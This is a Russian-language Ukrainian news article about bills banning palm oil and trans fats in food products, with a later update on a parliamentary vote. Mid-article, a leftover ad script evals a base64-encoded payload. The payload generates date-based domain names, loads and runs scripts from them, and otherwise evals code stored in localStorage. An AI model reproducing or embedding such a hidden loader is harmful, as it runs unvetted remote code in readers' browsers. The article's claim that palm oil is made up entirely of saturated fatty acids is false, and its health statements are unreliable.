Украинские пищевики, зная о вреде пальмового масла, все же не гнушаются этим продуктом.
В парламенте готов к рассмотрению законопроект №6068, которым должен быть введен запрет на использование этого продукта в отечественной пищевой промышленности, сообщает Погляд.
Причин для разработки такого законопроекта было две, говорит автор Дмитрий Соломчук. Первая — вредное воздействие этого масла на здоровье людей, вторая — сокращение производства подсолнечного масла из-за засилья пальмового в пищевом производстве.
Что касается второго, то в 2015 году произошел резкий скачек в потреблении пальмового масла отечественными производителями. Если в этом году Украина импортировала из Малайзии и Индонезии только по 70 000 тонн этого продукта, то с 2015 объем импорта вырос до 200 000 тонн.
«В ближайшее время ожидаем, что наш законопроект об ограничении использования трансжиров в сладостях попадет на первое чтение в сессионный зал. Аграрный комитет единогласно поддержал его принятие. Считаю, что украинцы должны выращивать и потреблять натуральное, а не сотни тысяч тонн пальмового масла из Малайзии», — говорит нардеп.
Украинские пищевики, зная о вреде пальмового масла для организма, все же не гнушаются этим продуктом. Понять их можно: с импортированной «пальмой» их изделия обходятся дешевле, чем с украинским подсолнечным маслом. Ведь себестоимость пальмового масла гораздо ниже.
Для сравнения: с гектара подсолнечника можно получить в среднем 600 л растительного масла, а с такой же площади пальм — 3 тонны. Причем пальма дает плоды дважды в год. Конечно, такое масло гораздо дешевле. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Однако то масло, которое импортируется в Украину, состоит из сплошных насыщенных жирных кислот, которые приводят к сердечно-сосудистым и даже онкозаболеваниям. Но благодаря дешевизне этого продукта и еще потому, что он долго не портится, пальмовое масло добавляют повсюду: от молочных и кондитерских изделий до детского питания.
Кстати, кроме законопроекта авторства Соломчука, в феврале нынешнего года в Раде также был зарегистрирован еще один законопроект — №5148 «О внесении изменений в некоторые законы Украины относительно повышения качества пищевых продуктов, потребляемых детьми».
Что хотят запретить:
использование пальмового масла в традиционных молочных продуктах;использование гидрогенизированного пальмового масла и других гидрогенизированных растительных жиров (кунжута, льна, глютена) в детском питании;использование гидрогенизированного пальмового масла в пищевых продуктах (кондитерские изделия: шоколад, мороженое и другие).
Таким образом, если эти два законопроекта будут приняты, то в Украине закончится эпоха пальмового масла, и будет сделан первый шаг к эпохе здорового питания.
ОБНОВЛЕНО. Как стало известно, сегодня Верховная Рада Украины в первом чтении приняла законопроект №5148, который будет способствовать совершенствованию нормативно-правового регулирования вопросов, связанных с безопасностью и качеством детского питания. Кроме того, принятие законопроекту позволит повысить качество пищевых продуктов, уменьшить заболеваемость населения и гармонизировать украинское законодательство в сфере детского питания требованиям законодательства государств-членов Европейского Союза.
«Госпродпотребслужба поддерживает принятие законопроекта №5148. Считаю его очень важным для сохранения здоровья наших детей и нации в целом. Это шаг вперед по обеспечению безопасности питания детей согласно последним мировым тенденциям. Уже около десяти стран ЕС законодательно урегулировали использование трансжиров », — подчеркнула глава Госпродпотребслужбы Владислава Магалецкая. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-ukraine-deputaty-gotovyatsya-zapretit-palmovoe-maslo/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook